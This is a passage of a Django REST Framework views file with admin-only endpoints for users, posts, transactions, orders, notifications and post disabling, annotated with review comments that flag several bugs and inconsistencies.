            userserializer = UserSerializer(activity,many=True)
            user_serial = userserializer.data
            # BUG FIX: the loop body referenced an undefined name ``i1`` and
            # raised NameError on any non-empty result; it must use the loop
            # variable. (Unused ``count`` query also removed.)
            # assumes the serialized dicts carry 'user_name' and 'email' keys — TODO confirm.
            for i in user_serial:
                i['user_name'] = i['user_name'][:30]
                i['email'] = i['email'][:30]
            return Response({"message" : "Response Send Succesfully","status" : "1","response":user_serial}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
################################################################################################
# list of registered users
################################################################################################
@api_view(['GET'])
def Registered_Users(request):
    """Admin-only endpoint: list all registered (non-staff, role=0) users.

    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 200 with every matching user serialized (user_name/email truncated
    to 30 chars) when at least one of them belongs to the 'User' group, 200
    with an empty list otherwise, 401 on auth failure, 500 on error.
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                if not user.groups.filter(name='Admin').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except Exception:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            users = User.objects.filter(is_staff=0, role=0)
            # The original looped over every user and returned the FULL list as
            # soon as any one of them belonged to the 'User' group; this is the
            # equivalent single membership check (without re-serializing per
            # iteration).
            if any(u.groups.filter(name='User').exists() for u in users):
                user_serial = UserSerializer(users, many=True).data
                for entry in user_serial:
                    entry['user_name'] = entry['user_name'][:30]
                    entry['email'] = entry['email'][:30]
                return Response({"message" : "Response Send Succesfully","status" : "1","response":user_serial}, status=status.HTTP_200_OK)
            # BUG FIX: the original fell off the end here (implicitly returning
            # None, which DRF rejects with a server error); return an empty list.
            return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Show Profile
############################################################
@api_view(['POST'])
def Show_Profile(request):
    """Admin-only endpoint: return one user's profile plus all of their posts.

    POST body: 'userId' -- the id of the user to show.
    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 201 with the serialized user (several fields truncated to 30 chars),
    their posts (newest first) and post count; 201 with "User Not Found" when the
    id does not resolve; 401 on auth failure; 500 on error.
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                api_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=api_key)
                user = token1.user
                userId = request.data.get('userId')
                check_group = user.groups.filter(name='Admin').exists()
                if check_group == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            print(userId)
            try:
                userr = User.objects.get(id=userId)
            except:
                # Unknown id (or DoesNotExist) -> "User Not Found" branch below.
                userr=None
            if userr is not None:
                user_detail = UserSerializer(userr)
                userserializer = user_detail.data
                # Truncate display fields for the admin listing UI.
                userserializer['user_name'] = userserializer['user_name'][:30]
                userserializer['fullname'] = userserializer['fullname'][:30]
                userserializer['email'] = userserializer['email'][:30]
                userserializer['about_me'] = userserializer['about_me'][:30]
                ####################post of the user
                post_count = Post.objects.filter(user_id=userId).count()
                post_user = Post.objects.filter(user_id=userId).order_by('-created_time')
                post_user_serializer = PostSerializer(post_user,many=True)
                poost = post_user_serializer.data
                ###################post images
                for i in poost:
                    i['post_description'] = i['post_description'][:30]
                    pst_image = PostImage.objects.filter(post_id=i['id']).values("post_images")
                    # NOTE(review): if a post has several images, each iteration
                    # overwrites 'image', so only the last one survives -- confirm
                    # that is intended.
                    for i1 in pst_image:
                        i['image'] = i1['post_images']
                return Response({"message" : addSuccessMessage, "status" : "1", "userr": userserializer,"user_post":post_user_serializer.data,"total_post":post_count}, status=status.HTTP_201_CREATED)
            else:
                return Response({"message" : "User Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################
# Show Post
############################################################
@api_view(['POST'])
def Show_Post(request):
    """Admin-only endpoint: return a single post (with its stored image) by id.

    POST body: 'postId' -- id of the post to show.
    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 201 with the serialized post, 201 with "User Not Found" when the id
    does not resolve, 401 on auth failure, 500 on error.
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                auth_key = request.META.get('HTTP_AUTHORIZATION')
                auth_token = Token.objects.get(key=auth_key)
                requester = auth_token.user
                post_pk = request.data.get('postId')
                if not requester.groups.filter(name='Admin').exists():
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                print(traceback.format_exc())
                return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            try:
                target_post = Post.objects.get(id=post_pk)
            except:
                target_post = None
            if target_post is None:
                return Response({"message" : "User Not Found", "status" : "1"}, status=status.HTTP_201_CREATED)
            payload = PostSerializer(target_post).data
            print(payload)
            # Attach the stored image path (the last row wins if several exist).
            image_rows = PostImage.objects.filter(post_id=payload['id']).values("post_images")
            for row in image_rows:
                payload['image'] = row['post_images']
            return Response({"message" : addSuccessMessage, "status" : "1", "reported_post": payload}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
######################################################################################
# get_trans_detail
######################################################################################
@api_view(['GET'])
def Trans_Detail(request):
    """Admin-only endpoint: list order transactions, optionally filtered.

    Query params:
      - 'search': when present, 'data' (a JSON object with keys 'user_name',
        'start_date', 'end_date') selects one of the filter branches below;
        each key may be '' or null (None) to mean "no filter on this field".
      - 'data': the JSON filter object (also re-read in the fallback branches).

    Every success response carries the serialized transactions with
    transaction_time/refund_time cut to the date part and a computed
    'service_tax' (6% of total_amount), plus each transaction's serialized user.
    Returns 200 on success (possibly with an empty list), 401 on auth failure,
    500 on unexpected errors.

    NOTE(review): the branches are near-duplicates and should eventually be
    collapsed into one parameterised query; kept verbatim here because the
    branch/exception flow is load-bearing (the big try's `except` is the
    fallback path when 'search' or 'data' is absent/bad).
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            ############### Search Start ################
            try:
                search = request.GET.get('search')
                # except:
                # search = None
                if search is not None:
                    print("if chla")
                    data = json.loads(request.GET.get('data'), strict=False)
                    print(data)
                    #########################all filter##############################
                    # if ((data['user_name']!='') and (data['start_date']!='') and (data['end_date']!='')):
                    #     print("all filter")
                    #     orders = OrderTrn.objects.all().count()
                    #     # start_date = datetime.datetime.strptime(data['start_date'], "%d/%m/%Y").strftime("%Y-%m-%d")
                    #     # print(stat_date)
                    #     user_id = User.objects.get(user_name=data['user_name'])
                    #     trans = OrderTrn.objects.filter(user_id=user_id.id,transaction_time__lte=data['start_date'],transaction_time__gt=data['end_date']).order_by('-transaction_time')
                    #     if trans:
                    #         transerializer = OrderTrnSerializer(trans,many=True)
                    #         trans = transerializer.data
                    #         for ii in trans:
                    #             ii['transaction_time'] = ii['transaction_time'][:10]
                    #             ii['refund_time'] = ii['refund_time'][:10]
                    #         for index,data in enumerate(trans):
                    #             trans_user = User.objects.filter(id=data['user'])
                    #             if trans_user:
                    #                 trans_user_serializer = UserSerializer(trans_user,many=True)
                    #                 trans[index]['user'] = trans_user_serializer.data[0]
                    #         return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                    #     else:
                    #         return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
                    # elif ((data['user_name']!='') and (data['start_date']!=None) and (data['end_date']!=None)):
                    #     print("all filter")
                    #     orders = OrderTrn.objects.all().count()
                    #     # start_date = datetime.datetime.strptime(data['start_date'], "%d/%m/%Y").strftime("%Y-%m-%d")
                    #     # print(stat_date)
                    #     user_id = User.objects.get(user_name=data['user_name'])
                    #     trans = OrderTrn.objects.filter(user_id=user_id.id,transaction_time__lte=data['start_date'],transaction_time__gt=data['end_date']).order_by('-transaction_time')
                    #     if trans:
                    #         transerializer = OrderTrnSerializer(trans,many=True)
                    #         trans = transerializer.data
                    #         for ii in trans:
                    #             ii['transaction_time'] = ii['transaction_time'][:10]
                    #             ii['refund_time'] = ii['refund_time'][:10]
                    #         for index,data in enumerate(trans):
                    #             trans_user = User.objects.filter(id=data['user'])
                    #             if trans_user:
                    #                 trans_user_serializer = UserSerializer(trans_user,many=True)
                    #                 trans[index]['user'] = trans_user_serializer.data[0]
                    #         return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                    #     else:
                    #         return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
                    ###########################empty filter##########################################
                    # No filter fields set (empty strings): return everything.
                    if ((data['user_name']=='') and (data['start_date']=='') and (data['end_date']=='')):
                        print("empty filter")
                        orders = OrderTrn.objects.all().count()
                        trans = OrderTrn.objects.all().order_by('-transaction_time')
                        print(trans)
                        if trans:
                            transerializer = OrderTrnSerializer(trans,many=True)
                            trans = transerializer.data
                            for ii in trans:
                                # Keep only the date part of the timestamps.
                                ii['transaction_time'] = ii['transaction_time'][:10]
                                ii['refund_time'] = ii['refund_time'][:10]
                                # 6% service tax, rounded to 2 decimals.
                                ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                            for index,data in enumerate(trans):
                                trans_user = User.objects.filter(id=data['user'])
                                if trans_user:
                                    trans_user_serializer = UserSerializer(trans_user,many=True)
                                    trans[index]['user'] = trans_user_serializer.data[0]
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                    # Same as above but the filter fields arrived as JSON null.
                    elif ((data['user_name']=='') and (data['start_date']==None) and (data['end_date']==None)):
                        print("empty filter")
                        orders = OrderTrn.objects.all().count()
                        trans = OrderTrn.objects.all().order_by('-transaction_time')
                        print(trans)
                        if trans:
                            transerializer = OrderTrnSerializer(trans,many=True)
                            trans = transerializer.data
                            for ii in trans:
                                ii['transaction_time'] = ii['transaction_time'][:10]
                                ii['refund_time'] = ii['refund_time'][:10]
                                ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                            for index,data in enumerate(trans):
                                trans_user = User.objects.filter(id=data['user'])
                                if trans_user:
                                    trans_user_serializer = UserSerializer(trans_user,many=True)
                                    trans[index]['user'] = trans_user_serializer.data[0]
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                    ##################################user filter########################################
                    # Only a user_name filter (dates empty strings).
                    elif ((data['user_name']!='') and (data['start_date']=='') and (data['end_date']=='')):
                        print("user filter")
                        orders = OrderTrn.objects.all().count()
                        user_id = User.objects.get(user_name=data['user_name'])
                        if user_id:
                            trans = OrderTrn.objects.filter(user_id=user_id.id).order_by('-transaction_time')
                            print(trans)
                            if trans:
                                transerializer = OrderTrnSerializer(trans,many=True)
                                trans = transerializer.data
                                for ii in trans:
                                    ii['transaction_time'] = ii['transaction_time'][:10]
                                    ii['refund_time'] = ii['refund_time'][:10]
                                    ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                                for index,data in enumerate(trans):
                                    trans_user = User.objects.filter(id=data['user'])
                                    if trans_user:
                                        trans_user_serializer = UserSerializer(trans_user,many=True)
                                        trans[index]['user'] = trans_user_serializer.data[0]
                                return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                            else:
                                return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                    # Only a user_name filter (dates arrived as JSON null); the
                    # inner try guards the User.objects.get lookup.
                    elif ((data['user_name']!='') and (data['start_date']==None) and (data['end_date']==None)):
                        print("user filter")
                        try:
                            orders = OrderTrn.objects.all().count()
                            user_id = User.objects.get(user_name=data['user_name'])
                            print(user_id,"llll")
                            trans = OrderTrn.objects.filter(user_id=user_id.id).order_by('-transaction_time')
                            print(trans)
                            if trans:
                                transerializer = OrderTrnSerializer(trans,many=True)
                                trans = transerializer.data
                                for ii in trans:
                                    ii['transaction_time'] = ii['transaction_time'][:10]
                                    ii['refund_time'] = ii['refund_time'][:10]
                                    ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                                for index,data in enumerate(trans):
                                    trans_user = User.objects.filter(id=data['user'])
                                    if trans_user:
                                        trans_user_serializer = UserSerializer(trans_user,many=True)
                                        trans[index]['user'] = trans_user_serializer.data[0]
                                return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                            else:
                                return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                        except:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                    ####################################date filter###########################################
                    # Only a date-range filter (user_name empty).
                    elif ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
                        print("date filter")
                        orders = OrderTrn.objects.all().count()
                        # NOTE(review): the sum uses __gt on start_date while the
                        # list below uses __gte -- the boundary day is counted in
                        # the list but not in the sum. Confirm which is intended.
                        trans_sum = OrderTrn.objects.filter(transaction_time__gt=data['start_date'],transaction_time__lte=data['end_date']).aggregate(Sum('total_amount'))
                        print(trans_sum)
                        trans = OrderTrn.objects.filter(transaction_time__gte=data['start_date'],transaction_time__lte=data['end_date']).order_by('-transaction_time')
                        print(trans)
                        if trans:
                            transerializer = OrderTrnSerializer(trans,many=True)
                            trans = transerializer.data
                            for ii in trans:
                                ii['transaction_time'] = ii['transaction_time'][:10]
                                ii['refund_time'] = ii['refund_time'][:10]
                                ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                            for index,data in enumerate(trans):
                                trans_user = User.objects.filter(id=data['user'])
                                if trans_user:
                                    trans_user_serializer = UserSerializer(trans_user,many=True)
                                    trans[index]['user'] = trans_user_serializer.data[0]
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                    # Date-range filter with user_name empty and dates non-null.
                    elif ((data['user_name']=='') and (data['start_date']!=None) and (data['end_date']!=None)):
                        print("date filter")
                        orders = OrderTrn.objects.all().count()
                        trans_sum = OrderTrn.objects.filter(transaction_time__gt=data['start_date'],transaction_time__lte=data['end_date']).aggregate(Sum('total_amount'))
                        print(trans_sum)
                        trans = OrderTrn.objects.filter(transaction_time__gte=data['start_date'],transaction_time__lte=data['end_date']).order_by('-transaction_time')
                        print(trans)
                        if trans:
                            transerializer = OrderTrnSerializer(trans,many=True)
                            trans = transerializer.data
                            for ii in trans:
                                ii['transaction_time'] = ii['transaction_time'][:10]
                                ii['refund_time'] = ii['refund_time'][:10]
                                ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                            for index,data in enumerate(trans):
                                trans_user = User.objects.filter(id=data['user'])
                                if trans_user:
                                    trans_user_serializer = UserSerializer(trans_user,many=True)
                                    trans[index]['user'] = trans_user_serializer.data[0]
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
                ####################################no filter#######################################
                # 'search' absent: re-read 'data' and serve the unfiltered list.
                else:
                    data = json.loads(request.GET.get('data'), strict=False)
                    if ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
                        print("no filter")
                        orders = OrderTrn.objects.all().count()
                        trans = OrderTrn.objects.all().order_by('-transaction_time')
                        if trans:
                            transerializer = OrderTrnSerializer(trans,many=True)
                            trans = transerializer.data
                            for ii in trans:
                                ii['transaction_time'] = ii['transaction_time'][:10]
                                ii['refund_time'] = ii['refund_time'][:10]
                                ii['service_tax'] = round(float(ii['total_amount']) *(.06),2)
                            for index,data in enumerate(trans):
                                trans_user = User.objects.filter(id=data['user'])
                                if trans_user:
                                    trans_user_serializer = UserSerializer(trans_user,many=True)
                                    trans[index]['user'] = trans_user_serializer.data[0]
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
            # Fallback when anything above raised (e.g. bad/missing 'data'):
            # re-parse and serve the unfiltered list.
            except:
                data = json.loads(request.GET.get('data'), strict=False)
                if ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
                    print("else chle")
                    orders = OrderTrn.objects.all().count()
                    trans = OrderTrn.objects.all().order_by('-transaction_time')
                    if trans:
                        transerializer = OrderTrnSerializer(trans,many=True)
                        trans = transerializer.data
                        for ii in trans:
                            ii['transaction_time'] = ii['transaction_time'][:10]
                            ii['refund_time'] = ii['refund_time'][:10]
                            # NOTE(review): this fallback charges 10% while every
                            # other branch charges 6% -- confirm which is correct.
                            ii['service_tax'] = round(float(ii['total_amount']) *(.10),2)
                        for index,data in enumerate(trans):
                            trans_user = User.objects.filter(id=data['user'])
                            if trans_user:
                                trans_user_serializer = UserSerializer(trans_user,many=True)
                                trans[index]['user'] = trans_user_serializer.data[0]
                        return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
                    else:
                        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################################################
# get_order_detail
#######################################################################################
@api_view(['GET'])
def Ord_Detail(request):
    """Admin-only endpoint: list all post orders, newest first, denormalized.

    Each serialized order is enriched in place: order_status codes are mapped to
    labels, and related image/user/price/description/size fields are flattened
    into the order dict.

    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 200 with the order list (or an empty list), 401 on auth failure,
    500 on error.
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            orders = OrderPost.objects.all().count()
            ord_det = OrderPost.objects.all().order_by('-created_time')
            if ord_det:
                ordserializer = OrderPostSerializer(ord_det,many=True)
                odr = ordserializer.data
                for ii in odr:
                    # Keep only the date part of the timestamp.
                    ii['created_time'] = ii['created_time'][:10]
                for i in odr:
                    # Map numeric status codes to display labels.
                    if i['order_status']==1:
                        i['order_status']="Accepted"
                    elif i['order_status']==2:
                        i['order_status']="Rejected"
                    elif i['order_status']==0:
                        i['order_status']="Pending"
                    elif i['order_status']== -1:
                        i['order_status']="Deleted"
                    elif i['order_status']==-2:
                        i['order_status']="Cancelled"
                    # Flatten related rows into the order dict; each loop simply
                    # assigns from the matching row(s), last match winning.
                    # NOTE(review): this filters PostImage by its own id (not
                    # post_id) using the order's 'post_images' value -- confirm
                    # that field actually holds a PostImage id here.
                    odr_post_image = PostImage.objects.filter(id=i['post_images']).values("post_images")
                    for i1 in odr_post_image:
                        i['post_images'] = i1['post_images']
                    odr_user = User.objects.filter(id=i['user']).values("username")
                    for i1 in odr_user:
                        i['user'] = i1['username']
                    odr_post_price = Post.objects.filter(id=i['post']).values("price")
                    for i1 in odr_post_price:
                        i['price'] = i1['price']
                    odr_post = Post.objects.filter(id=i['post']).values("post_description")
                    for i1 in odr_post:
                        i['post'] = i1['post_description'][:30]
                    odr_size = Size.objects.filter(id=i['size']).values("size")
                    for i1 in odr_size:
                        i['size'] = i1['size']
                    # #######################add post####################
                    # for index, data in enumerate(odr):
                    #     ordr_post = Post.objects.filter(id=data['post'])
                    #     print(ordr_post)
                    #     if ordr_post:
                    #         order_post_serializer = PostSerializer(ordr_post)
                    #         odr[index]['post'] = order_post_serializer.data
                    # ########################add user##############################
                    # for index,data in enumerate(odr):
                    #     pst_rpt_user = User.objects.filter(id=data['user'])
                    #     if pst_rpt_user:
                    #         pst_rpt_serializer_u = UserSerializer(pst_rpt_user,many=True)
                    #         odr[index]['user'] = pst_rpt_serializer_u.data[0]
                    # #####################add size#################################
                    # for index,data in enumerate(odr):
                    #     odr_size = Size.objects.filter(id = data['size'])
                    #     if odr_size:
                    #         odr_size_serializer = SizeSerializer(odr_size,many=True)
                    #         odr[index]['size'] = odr_size_serializer.data[0]
                return Response({"message" : "Response Send Succesfully","status" : "1","response":odr}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################################################
# Notification _list_admin
###############################################################################################
@api_view(['GET'])
def Admin_Notified(request):
    """Admin-only endpoint: aggregate the admin notification feed.

    Collects four lists, each newest-first with created_time cut to the date
    part and related user/post/image rows spliced into each entry:
      - 'support': ContactUs submissions
      - 'shared_post_comment': comments (status=1) on active promotional posts
      - 'disable_post': ReportPost rows with status=0 (disabled posts)
      - 'report': ReportPost rows with status=1 (reported posts)

    NOTE(review): if contact_us is empty, `contct` is never bound, the final
    return raises NameError inside the last try, and the except at the bottom
    answers with empty lists -- the control flow leans on that. Documented
    as-is; restructure with care.

    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin'
    group. Returns 200 (possibly with empty lists), 401 on auth failure,
    500 on unexpected errors.
    """
    try:
        with transaction.atomic():
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                print(token1)
                user = token1.user
                checkGroup = user.groups.filter(name = 'Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"},status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            # --- support/contact-us entries ---
            contact_us = ContactUs.objects.all().order_by('-created_time')
            if contact_us:
                print("kkk")
                lst_data = ContactUsSerializer(contact_us,many=True)
                print("jjj")
                contct = lst_data.data
                for ii in contct:
                    ii['created_time'] = ii['created_time'][:10]
                for index,data in enumerate(contct):
                    cont_user = User.objects.filter(id=data['user'])
                    if cont_user:
                        cont_user_serializer = UserSerializer(cont_user,many=True)
                        contct[index]['user'] = cont_user_serializer.data[0]
            #########################shared post comment########################
            try:
                ids =Post.objects.filter(post_status=1,post_type="promotional")
                shared_pst = PostComment.objects.filter(status=1,post_id__in=ids).order_by('-created_time')
                print(shared_pst)
                if shared_pst:
                    shared_dta = PostCommentSerializer(shared_pst,many=True)
                    shared_pst = shared_dta.data
                    print(shared_pst,"dekho")
                    for ii in shared_pst:
                        print("hh")
                        ii['created_time'] = ii['created_time'][:10]
                    ######################image
                    for index,data in enumerate(shared_pst):
                        promo_image = PostImage.objects.filter(post_id=data['post'])
                        if promo_image:
                            promo_serial = PostImageSerializer(promo_image, many=True)
                            shared_pst[index]['image'] = promo_serial.data[0]
                    ############add post
                    for index,data in enumerate(shared_pst):
                        shared_rpt = Post.objects.filter(id=data['post'])
                        if shared_rpt:
                            shared_rpt_serializer = PostSerializer(shared_rpt,many=True)
                            shared_pst[index]['post'] = shared_rpt_serializer.data[0]
                    ###########add user
                    for index,data in enumerate(shared_pst):
                        shared_pst_user = User.objects.filter(id=data['user'])
                        if shared_pst_user:
                            shared_pst_serializer_u = UserSerializer(shared_pst_user,many=True)
                            shared_pst[index]['user'] = shared_pst_serializer_u.data[0]
            except:
                # Best-effort: on any failure this section contributes nothing.
                shared_pst =[]
            ##################disabled post #############################
            try:
                disabled_pst = ReportPost.objects.filter(status=0).order_by('-created_time')
                if disabled_pst:
                    disable_dta = ReportPostSerializer(disabled_pst,many=True)
                    if disable_dta:
                        disable_pst = disable_dta.data
                        for ii in disable_pst:
                            ii['created_time'] = ii['created_time'][:10]
                        ############add post
                        for index,data in enumerate(disable_pst):
                            disable_rpt = Post.objects.filter(id=data['post'])
                            if disable_rpt:
                                disable_rpt_serializer = PostSerializer(disable_rpt,many=True)
                                disable_pst[index]['post'] = disable_rpt_serializer.data[0]
                                disable_pst[index]['post']['created_time'] = disable_pst[index]['post']['created_time'][:10]
                                disable_pst[index]['post']['post_description'] = disable_pst[index]['post']['post_description'][:30]
                        ###########add user
                        for index,data in enumerate(disable_pst):
                            disable_pst_user = User.objects.filter(id=data['user'])
                            if disable_pst_user:
                                disable_rpt_serializer_u = UserSerializer(disable_pst_user,many=True)
                                disable_pst[index]['user'] = disable_rpt_serializer_u.data[0]
                else:
                    disable_pst =[]
            except:
                disable_pst =[]
            ###############reported post###################
            try:
                report_pst = ReportPost.objects.filter(status=1).order_by('-created_time')
                if report_pst:
                    pst_dta = ReportPostSerializer(report_pst,many=True)
                    pst = pst_dta.data
                    for ii in pst:
                        ii['created_time'] = ii['created_time'][:10]
                    ######################image
                    for index,data in enumerate(pst):
                        promo_image = PostImage.objects.filter(post_id=data['post'])
                        if promo_image:
                            promo_serial = PostImageSerializer(promo_image, many=True)
                            pst[index]['image'] = promo_serial.data[0]
                    ############add post
                    for index,data in enumerate(pst):
                        pst_rpt = Post.objects.filter(id=data['post'])
                        if pst_rpt:
                            pst_rpt_serializer = PostSerializer(pst_rpt,many=True)
                            pst[index]['post'] = pst_rpt_serializer.data[0]
                            pst[index]['post']['created_time'] = pst[index]['post']['created_time'][:10]
                            pst[index]['post']['post_description'] = pst[index]['post']['post_description'][:30]
                    ###########add user
                    for index,data in enumerate(pst):
                        pst_rpt_user = User.objects.filter(id=data['user'])
                        if pst_rpt_user:
                            pst_rpt_serializer_u = UserSerializer(pst_rpt_user,many=True)
                            pst[index]['user'] = pst_rpt_serializer_u.data[0]
                # NOTE(review): raises NameError when contct/pst are unbound
                # (empty querysets), which the except below converts into the
                # empty-lists response.
                return Response({"message" : "Response Send Successfully","status" : "1","support":contct,"report":pst,"disable_post":disable_pst,"shared_post_comment":shared_pst},status=status.HTTP_200_OK)
            except:
                return Response({"message" : "Response Send Successfully","status" : "1","support":[],"report":[],"disable_post":[],"shared_post_comment":shared_pst},status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#####################################################################################
# Disable post by admin
#####################################################################################
@api_view(['POST'])
def DisablePostByAdmin(request):
    """Admin-only endpoint: disable an active post and everything attached to it.

    JSON body: 'post_id' -- the id of a post with post_status=1.
    Side effects: sets the post's post_status to 0, flips its ReportPost rows to
    status=0, decrements the owner's post_count, disables Favourite rows for the
    post, and pushes a "post disabled" notification to the owner.

    Auth: HTTP_AUTHORIZATION must hold a token whose user is in the 'Admin' group.
    Returns 200 on success, 401 on auth failure, 500 otherwise (including when
    the post is not found/active -- Post.objects.get raises into the outer
    except).
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            # --- authorization: resolve token -> user, require 'Admin' group ---
            try:
                API_key = request.META.get('HTTP_AUTHORIZATION')
                token1 = Token.objects.get(key=API_key)
                user = token1.user
                checkGroup = user.groups.filter(name='Admin').exists()
                if checkGroup == False:
                    return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            except:
                return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
            post_id = received_json_data['post_id']
            # Raises DoesNotExist (-> 500 below) if the post is absent/inactive.
            post = Post.objects.get(id=post_id,post_status =1)
            print(post.user_id)
            user1 = User.objects.get(id =post.user_id)
            if post:
                post1 = Post.objects.filter(id = post.id,user_id=post.user_id).update(post_status=0)
